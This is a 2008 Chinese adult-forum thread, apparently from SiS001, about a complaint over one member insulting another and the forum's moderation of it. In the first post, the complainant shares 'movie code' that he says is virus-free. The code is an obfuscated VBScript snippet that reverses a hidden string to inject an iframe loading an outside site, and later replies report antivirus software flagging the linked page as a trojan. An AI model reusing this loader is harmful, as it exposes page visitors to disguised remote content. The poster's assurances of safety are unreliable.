标题: [投诉] ruoangel会员恶意骂人,请求管理员处理! [打印本页]

作者: loyi    时间: 2008-3-14 19:45     标题: ruoangel会员恶意骂人,请求管理员处理!

我在色中色玩了多年,从来都是给大家带来好的内容.极少得罪别人,今天回来,刚从短信从看到一个会员骂人,极不礼貌,一个有点教养的人是不会说出如此低级语气的人,请兄弟们看看短信截图后给评个理!!!

大家都来色中色玩的,有什么不足之处请先指出事情来.别再有事没事就骂人.我在这里给大家分享的好东西,大家都有共识的,如果还有类似情况.,我想可能来这里玩的就少了.

3月15日早上补充材料说明如下:
补充我个人材料截图如下:

很明显,我有一个主题被移到回收站2号,我再在此给大家看看我那个看电影的网页(本人制作的,绝对没有病毒代码!我都给我的同事和网友们看过了!!)http://movie.6yikj.cn  或者是http://6yikj.cn/Movie.htm

在此再敬请兄弟们认真测试一下,如果真有病毒码,我的IP被删除了都不可惜.

在此顺便给大家分享那个电影代码: (hawknest会员也曾经问我要这个代码,我就在此发布了,请大家帮忙叫他上网来到这里时叫他一声.)
<textarea style="display:none" id=lshdic200Xpage>>emarfi/<>0=redrobemarf on=gnillorcs 024=thgieh 0001=htdiw "mth.og/nc.ydlx//:ptth"=crs emarfi<</textarea><script language=vbs>document.write(strreverse(lshdic200Xpage.value))</script>

如果电脑里面的杀毒软件升级到最新版本,还有系统有什么漏洞要尽快解决.我想你的电脑上网时是没有什么问题的,

作者: LiveLiub    时间: 2008-3-14 19:50

支持楼主  骂人是不对啊  我们sis要做的有品味
作者: 纯情少年    时间: 2008-3-14 19:54

支持老大的投诉,望斑竹大人查实后给与严厉处分。
作者: 暴走浣熊    时间: 2008-3-14 20:06

骂人是要被删除ID的,不管什么理由。
作者: 瑟瑟小猪猪    时间: 2008-3-14 20:50     标题: 回复 1楼 的帖子

投诉的有理有据 侮辱其他会员应该被删除ID
不过看到这个人说的病毒的问题 问一下楼主 这个问题是怎么回事?是否该解释一下 因为病毒帖子广告帖子也在删除ID的范围之内
作者: 宪哥    时间: 2008-3-14 22:24

希望能指出因爲哪個帖子産生的口角。
作者: 24680    时间: 2008-3-14 23:47

这种人态度有问题 希望他能自我控制一下,必竟骂人总是不好的~
作者: 飞鹰    时间: 2008-3-14 23:49     标题: 回复 1楼 的帖子

投诉时应给出相关的帖子链接。

我已去短信询问ruoangel证实。
作者: 赌魔    时间: 2008-3-15 00:53

对于ruoangel的所作所为如果是真的就希望飞大哥删除ID,
骂人已经不对,而且还加入了XX的字眼就没有必要再说了,
记得本人之前也有遇过病毒帖子但是本人也没有乱来。
本人只是发帖通知兄弟们帖子内存着了病毒木马等问题。
因为帖子中无论下载什么东西都可能会遇到病毒木马的。
ruoangel在电脑世界内应该拥有一点点的病毒经验知识。
因为一个病毒软件不可能将全部病毒木马等都测试到的。
也可能是病毒软件出现错误的信息也不一定,
这一点玩电脑的人应该意识到这个问题的存在。
如果ruoangel被处罚希望以后投诉时冷静一点。
作者: 醋坛子    时间: 2008-3-15 09:39

骂人是不对,不过楼主你发的是原创还是转贴呢,如果是原创有病毒的话,那你也有不对的地方哦.
转贴的没有办法,但如果自己下过的话,就应该在帖子里提醒大家,有病毒的文件不要下.
作者: ruoangel    时间: 2008-3-15 11:50

我不知道应该怎么说, 如果你的网页没有病毒的话 为什么会到自动回收? 骂你是我的不对 我向你道歉,也希望管理员能对我进处罚! 但是我要说的是, 如果你以后还是发那种带有病毒的网页的连接的话, 我就算是不在sis混 也还是要骂你! 做为sis的狼友 希望你能有一点点网络道德! 再次为骂你的事情向你道歉 对不起
作者: loyi    时间: 2008-3-15 12:22

引用:
原帖由 ruoangel 于 2008-3-15 11:50 发表
我不知道应该怎么说, 如果你的网页没有病毒的话 为什么会到自动回收? 骂你是我的不对 我向你道歉,也希望管理员能对我进处罚! 但是我要说的是, 如果你以后还是发那种带有病毒的网页的连接的话, 我就算是不在sis混 也还 ...
我做的网页是给我的同事、网友们测试过了的,都没有说过有病毒。只是有插件弹出的可能性,用的是国外的免费空间,另外我要说一下,如果你的电脑装上杀毒软件了,漏洞也及时更新解决了,我看电脑是不会出现你所说的情况,我真还想在此请教一下有电脑专业维修技术的朋友测一下呢?这么一个小小问题还跟我讲那么多,我实在难说你了,玩电脑不但要学会玩,还要学会维护使用!特别是什么样去安全使用!不要一出问题就先说别人,得先查查自己有没有问题!难道我有意害大家!!你太小看我了吧!我做了那行多网页,都是从发图精英们交流中长见识的,我的网站都是自己从网上学来后制作的,你以为那么容易做吗?
作者: 霸王鹰    时间: 2008-3-15 12:29     标题: 回复 13楼 的帖子

算了楼主,对方已经道歉,态度也较为诚恳,你就不要生气了。

ruoangel 也是注册时间较长的会员了,难道不知道辱骂其它会员的后果吗?希望你这次接受教训,用正确的态度处理问题。
作者: 宪哥    时间: 2008-3-15 14:49

原價易解,不易結。大家相互體諒吧。
作者: 赌魔    时间: 2008-3-15 15:50

本人认同霸王鹰以及宪哥的说话,毕竟楼主已经得到应该的道歉,希望楼主可以忘记这件事。

另外本人希望有一点点的意见发表给ruoangel,其实没有必要动不动就骂人的。《提醒》这个字眼有时候很好用的。
作者: 飞鹰    时间: 2008-3-15 16:21     标题: 回复 12楼 的帖子

你这个道歉的态度也太冲了些,碰到类似的事情,第一时间通知版主来处理,而不应该是破口大骂,这次扣两威望,不希望再有下次同样的事情发生。
作者: awnek    时间: 2008-3-15 16:50

骂人肯定不对,共建SIS论坛和谐共处美好社区才是各位网友努力的方面。
作者: su37sm    时间: 2008-3-15 18:07

这个可能是不是误会了,不过骂人总是不对!大家互相体谅!
作者: liuxichuan    时间: 2008-3-15 18:33

的确,点击楼主的这个链接,杀毒软件保护提示有木马程序; http://6yikj.cn/Movie.htm
ps; 我的系统没漏洞,微软官方补丁是打全了的,我用的正版<卡巴斯基套装7.0>
作者: loyi    时间: 2008-3-15 19:45

引用:
原帖由 liuxichuan 于 2008-3-15 18:33 发表
的确,点击楼主的这个链接,杀毒软件保护提示有木马程序; http://6yikj.cn/Movie.htm
ps; 我的系统没漏洞,微软官方补丁是打全了的,我用的正版
我前面也听说装有卡吧杀软的朋友说出现这个问题,不过装有其它杀软的朋友说是没有出现这种情况,有点怪了,我个人建议装瑞星的好,这个软件有相当多数人用,瑞星中国用户数量比卡吧的用户量多得多.
作者: mervyn3968    时间: 2008-3-15 20:02     标题: 回复 1楼 的帖子

楼主你在检查检查,你发的网址确实被卡巴警告有木马,我刚用最新的卡巴试了,希望你以后发的时候注意!
作者: 宪哥    时间: 2008-3-15 22:55

算了算了,大家來BT區,我給你們推薦些片子看,消消火。
作者: ioribian    时间: 2008-3-15 23:36

对!我以前也在sis玩过!这是我第2个号!以前就是因为有些人喜欢乱骂人我才走的
作者: 宪哥    时间: 2008-3-16 11:52     标题: 回复 24楼 的帖子

實行你的權力,舉報。
作者: ad336923    时间: 2008-3-16 19:21

楼主的帖子,我几天前就看过的,没有什么问题。我用的是瑞星杀毒。

欢迎光临 SiS001! Board - [第一会所 关闭注册] (http://23.225.255.115/bbs/) Powered by Discuz! 7.2